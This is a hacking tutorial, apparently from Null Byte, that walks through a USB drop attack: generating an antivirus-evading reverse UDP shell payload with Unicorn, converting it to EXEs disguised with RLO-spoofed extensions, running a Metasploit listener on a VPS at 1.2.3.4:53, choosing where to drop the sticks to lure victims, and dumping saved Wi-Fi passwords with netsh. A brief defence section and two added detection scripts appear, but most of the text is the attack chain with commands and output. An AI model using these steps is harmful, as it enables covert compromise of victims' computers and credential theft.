
How to Hack WPA2 Wi-Fi Passwords with Jedi Mind Tricks (and USB Dead Drops) « Null Byte :: WonderHowTo



The newest Star Wars movie, Solo: A Star Wars Story, took in almost $350 million in its first month in theaters worldwide. This is a good opportunity to discuss how hackers can use media hype (Hollywood movie hype in this case) to get an unsuspecting Windows user to plug a malicious USB stick into their computer.

A long time ago, in a galaxy far, far away … researchers at a university campus in Illinois carried out a study in which 300 malicious USB sticks were dropped around the campus. Almost 50% of the USB sticks were picked up, and at least one file was opened on each of those drives.

The data showed that attaching keys to the USB stick's key ring increased the likelihood that the flash drive was inserted into a computer. The presence of keys reinforced the belief that the keys and the USB stick had been lost rather than planted by a hacker. The data also suggest that USB sticks labeled "Pictures" or "Winter Break Pictures" are more likely to be inserted by the victim. Both keys and labels should be taken into account when planning a USB drop.

The researchers' experiment targeted students and professors. It relied on their readiness to believe that a student could lose a USB stick on school grounds. But what if the target wireless router is not located at a university?

This type of attack does not have to use the Star Wars franchise as its theme; I'm just a big fan of the movies. During a reconnaissance phase, it might be discovered that a target user is obsessed with zombie movies and TV series. In that case, loading the USB flash drive with content inspired by The Walking Dead or by a well-known horror filmmaker would make more sense. The point is to label the USB flash drive and fill it with content that the intended victim will find hard to ignore. Make it tempting and exciting.

This attack was tested against a Windows 10 Enterprise computer running Avast Antivirus.

Picture by Sergey Jarochkin / 123RF

Step 1: Purchase the USB Sticks

At least one USB flash drive is required for this attack. At the time of this writing, USB sticks can be purchased in bulk through sites such as Amazon, Best Buy, and Newegg. I found that it is usually possible to get 10 USB flash drives for about $20. Keep in mind that these prices and offers will change over time.

You could use a larger capacity like 16 GB to really sell the idea that a movie is on the stick, but chances are the user won't notice the size unless it is printed directly on the stick, so a smaller, cheaper one works just as well.

On Amazon: 10-Pack ALMEMO 128MB USB 2.0 Sticks, Swivel, Black, for $21 + Free Prime Shipping

Attaching keys to the USB stick's key ring is likely to increase the chance that the stick is picked up and used. A local hardware store is a good place to look for cheap padlocks and keys. Keys are optional, however. You could use the keys from a padlock or the house keys that come with new door knobs; any style works if you want to attach keys.

Step 2: Set Up the VPS and Install Metasploit

A virtual private server (VPS) is required to host the Metasploit listener. This is what lets the attacker execute commands and dump Wi-Fi passwords on the compromised Windows computers. Install the latest version of Metasploit on a VPS with at least 1 GB of RAM.

Step 3: Clone the Unicorn Repository

Use Unicorn on a local Kali computer (not on the VPS) to create an undetectable payload. Unicorn is an excellent tool for generating sophisticated payloads that can bypass antivirus software. Readers who missed our article on creating an undetectable payload for Windows 10 should review it, as many of the techniques shown there have been adapted for this demo.

After cloning Unicorn, change into the unicorn/ directory and run the following command:

  python unicorn.py windows/shell/reverse_udp 1.2.3.4 53

This payload creates a reverse UDP connection (reverse_udp) to the attacker's VPS IP address (1.2.3.4) on port 53. UDP on port 53 is used in an effort to further disguise the payload and its network activity: anyone examining the traffic to and from the compromised Windows computer could mistake the packets for normal DNS activity. This does not make the malicious packets impossible to discover, but it can help evade Deep Packet Inspection (DPI).
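As an added defender-side check (not part of the original article or of Unicorn), the following Python parses what a host sends to UDP port 53 and flags datagrams that do not form a well-formed DNS query. That is how a raw reverse_udp stage on port 53 is told apart from real DNS despite the port choice; the two sample packets are constructed here.

```python
import struct
import string

# Characters permitted in a hostname label (letters, digits, hyphen, underscore)
LABEL_CHARS = set((string.ascii_letters + string.digits + "-_").encode())


def parse_dns_query(data: bytes):
    """Return (qname, qtype) if data is a well-formed single-question DNS query, else None."""
    if len(data) < 12:
        return None
    _id, flags, qdcount, ancount, nscount, _arcount = struct.unpack("!HHHHHH", data[:12])
    qr, opcode = flags >> 15, (flags >> 11) & 0xF
    # A query has QR=0, a standard opcode, one question and no answer/authority records
    if qr != 0 or opcode != 0 or qdcount != 1 or ancount or nscount:
        return None
    pos, labels = 12, []
    while True:
        if pos >= len(data):
            return None
        length = data[pos]
        pos += 1
        if length == 0:
            break
        if length > 63 or pos + length > len(data):  # labels are at most 63 octets
            return None
        label = data[pos:pos + length]
        if any(c not in LABEL_CHARS for c in label):
            return None
        labels.append(label.decode("ascii"))
        pos += length
    if pos + 4 > len(data):
        return None
    qtype, qclass = struct.unpack("!HH", data[pos:pos + 4])
    if qclass != 1:  # only class IN is expected on a normal resolver path
        return None
    return ".".join(labels), qtype


def is_suspicious_udp53(payload: bytes) -> bool:
    """True when a datagram sent to port 53 is not a DNS query and deserves an alert."""
    return parse_dns_query(payload) is None


# Constructed samples: a normal A query for example.com (id 0x1234, RD set) ...
DNS_QUERY = (b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
             b"\x07example\x03com\x00\x00\x01\x00\x01")
# ... and the kind of bytes a cmd.exe reverse shell emits over the same port
SHELL_OUTPUT = b"Microsoft Windows [Version 10.0.16299.431]\r\n(c) 2017 Microsoft Corporation.\r\n"
```

Run it over the payloads of packets whose destination port is 53, grouped by source host; a steady stream of non-DNS datagrams from one host to one address on port 53 is the pattern to alert on.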

Step 4: Save the Payload

Next, open the newly created powershell_attack.txt file in the unicorn/ directory. Select the entire PowerShell command and save it on a Windows 10 computer with the filename payload.bat.

Step 6: Convert Images to Icons

Once you have decided which images and icons to use, convert them with ConvertICO. Simply upload the images to the website and it will return them in ICO format. Save the new ICOs on the Windows 10 computer.

Pictures by Unsplash and Looper / YouTube

Step 7: Set Up & Install B2E on Windows 10

Next, download and install B2E, a Windows tool for converting batch files into executables. This has been covered several times before, so I'll move on.

Step 8: Converting the PowerShell Payload to an Executable

When B2E finishes installing, import payload.bat and select the desired ICO. Click the "Convert" button to create the EXE and save the file.

This payload.bat can be reused over and over to create multiple fake files. Just change the ICO file (converted in the previous step) and export under a different filename. Each file appears to be a different image (or document), but executes the same payload and opens another connection from the target Windows computer.

Step 9: Spoof the File Extensions

When all the EXEs have been created, rename the files and inject the RLO (right-to-left override) Unicode character to fake the extensions.

The EXE extension can be replaced with SCR without affecting the payload. SCR is one of several file extensions that let hackers quietly execute EXEs. The payload still runs normally, and the SCR extension ("RCS" when inverted by RLO) is much less conspicuous than "EXE" in the file name.

As shown in the GIF above, every file on the USB drive should have its filename and extension faked this way. If more than one USB flash drive is used in the attack, the payloads with the faked extensions should be copied to each dropped USB drive.

Step 10: Start Metasploit

With the payloads ready, it's now safe to start Metasploit on the VPS. The unicorn/ directory contains a unicorn.rc resource file that automates the msfconsole setup. Copy the resource file to the VPS. Msfconsole can then be started with the following command: msfconsole -r /path/to/unicorn/unicorn.rc.

  screen msfconsole -r /path/to/unicorn/unicorn.rc


       =[ metasploit v4.16.60-dev                         ]
+ -- --=[ 1771 exploits - 1010 auxiliary - 307 post       ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /opt/unicorn/unicorn.rc for ERB directives.
resource (/opt/unicorn/unicorn.rc)> use multi/handler
resource (/opt/unicorn/unicorn.rc)> set payload windows/shell/reverse_udp
payload => windows/shell/reverse_udp
resource (/opt/unicorn/unicorn.rc)> set LHOST 1.2.3.4
LHOST => 1.2.3.4
resource (/opt/unicorn/unicorn.rc)> set LPORT 53
LPORT => 53
resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/opt/unicorn/unicorn.rc)> exploit -j
[*] Exploit running as background job 0.

[*] Started reverse handler on 1.2.3.4:53
msf exploit(multi/handler) >

For those unfamiliar with it, "screen" is a program that lets users manage multiple terminal sessions within the same console. It can "detach" a session, closing the terminal window without losing what is running inside it. By running msfconsole inside screen, attackers can end their SSH session to the VPS without shutting down the msfconsole listener.

Step 11: Label and Drop the USB Sticks

Where and how to drop the USB stick(s) depends on the scenario. If only one person is targeted, it makes sense to leave the USB stick near or around their desk, their office, their driveway, their front porch or their apartment door.

For a mass attack, where a whole group of people has access to the target Wi-Fi network, it is better to leave the USB flash drives in common areas and parking lots so that as many people as possible come across them.

Step 12: Dump the Wi-Fi Passwords (Post-Exploitation)

When a file on a USB drive is opened, a new connection is established to the VPS. In the msfconsole terminal, use the sessions command to list the compromised Windows machines.

  msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information                                                                       Connection
  --  ----  ----               -----------                                                                       ----------
  1         shell x86/windows  Microsoft Windows [Version 10.0.16299.431] (c) 2017 Microsoft Corporation. Al...  1.2.3.4:53 -> xxxx:53480 (xxxx)

Interact with a session by its Id using the -i argument (sessions -i 1).

  msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [Version 10.0.16299.431]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Users\IEUser>

At this point, the attacker has a low-privilege Windows command prompt (cmd). Use the command netsh wlan show profiles to list the Wi-Fi networks the Windows computer has connected to in the past.

  C:\Users\IEUser> netsh wlan show profiles

Profiles on interface Wi-Fi:

Group policy profiles (read only)
---------------------------------


User profiles
-------------
    All User Profile     : 446CF4
    All User Profile     : Tatooine
    All User Profile     : 3PVXQ
    All User Profile     : Stewie
    All User Profile     : FiOS-6DH1H
    All User Profile     : attwifi
    All User Profile     : Death Star
    All User Profile     : Belkin.4412
    All User Profile     : Garden Guest
    All User Profile     : Jedi Temple
    All User Profile     : cradle233
    All User Profile     : Lando Calrissian
    All User Profile     : TransitWirelessWiFi
    All User Profile     : StudioWifi
    All User Profile     : ACE lobby
    All User Profile     : Lark Cafe
    All User Profile     : D9F9AD

To display the password for a specific Wi-Fi network, add the name and key=clear arguments. The password ("Attack of the Clones") appears on the "Key Content" line.

  C:\Users\IEUser> netsh wlan show profile name="tatooine" key=clear

Profile Tatooine on interface Wi-Fi:
=======================================================================

Applied: All User Profile

Profile information
-------------------
    Version                : 1
    Type                   : Wireless LAN
    Name                   : Tatooine
    Control options        :
        Connection mode    : Connect automatically
        Network broadcast  : Connect only if this network is broadcasting
        AutoSwitch         : Do not switch to other networks
        MAC Randomization  : Disabled

Connectivity settings
---------------------
    Number of SSIDs        : 1
    SSID name              : "Tatooine"
    Network type           : Infrastructure
    Radio type             : [ Any Radio Type ]
    Vendor extension       : Not present

Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Authentication         : WPA2-Personal
    Cipher                 : GCMP
    Security key           : Present
    Key Content            : Attack of the Clones

Cost settings
-------------
    Cost                   : Unrestricted
    Congested              : No
    Approaching Data Limit : No
    Over Data Limit        : No
    Roaming                : No
    Cost Source            : Default

How to Protect Against USB Drop Attacks

If you find a stray USB drive, leave it alone. If it has keys attached and you want to return them, it's fine to be a good Samaritan, but do not try to find out what is on the USB storage device. For remediation, the researchers recommend the following:

If you cannot prevent USB devices from being connected at all, you should at least:

  • View details: use the Details layout view in Windows Explorer. It shows the file type column and lets you spot strange or suspicious file types.
  • Always display file extensions: make sure that file type extensions are not "hidden".
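An added example, not from the original article, that applies the two recommendations above programmatically and covers the RLO trick from Step 9: it computes how a file manager would render a name containing U+202E and compares the extension the user sees with the extension Windows actually acts on. The file names in the sample listing are constructed for the demonstration.

```python
import os

RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE: text after it is rendered reversed
# Other bidi control characters that can hide an extension the same way (flagged, not simulated)
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e"}
# Extensions Windows executes on double-click; .scr is the one Step 9 relies on
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif", ".vbs", ".ps1"}


def displayed_name(name: str) -> str:
    """Approximate the rendered form of a name: everything after the RLO appears reversed."""
    if RLO not in name:
        return name
    head, _, tail = name.partition(RLO)
    return head + tail[::-1]


def analyze_filename(name: str) -> dict:
    """Compare the extension a user sees with the extension Windows will act on."""
    actual_ext = os.path.splitext(name)[1].lower()
    shown = displayed_name(name)
    shown_ext = os.path.splitext(shown)[1].lower()
    return {
        "displayed": shown,
        "displayed_ext": shown_ext,
        "actual_ext": actual_ext,
        "has_bidi_control": any(c in name for c in BIDI_CONTROLS),
        # spoofed: an RLO hides an executable behind a harmless-looking extension
        "spoofed": RLO in name and actual_ext in EXECUTABLE_EXTS and shown_ext != actual_ext,
    }


def find_spoofed(names):
    """Return the entries of a directory listing (e.g. os.listdir of the USB root) that are spoofed."""
    return [n for n in names if analyze_filename(n)["spoofed"]]


# Constructed sample listing: one RLO-disguised .scr posing as a PNG, two benign files
SAMPLE_LISTING = [
    "Han Solo_" + RLO + "gnp.scr",  # renders as "Han Solo_rcs.png"
    "Winter Break Pictures.png",
    "Solo Trailer.mp4",
]

if __name__ == "__main__":
    for entry in SAMPLE_LISTING:
        print(analyze_filename(entry))
```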


Cover picture by Daniel Cheung / Unsplash; screenshots by tokyoneon / Null Byte
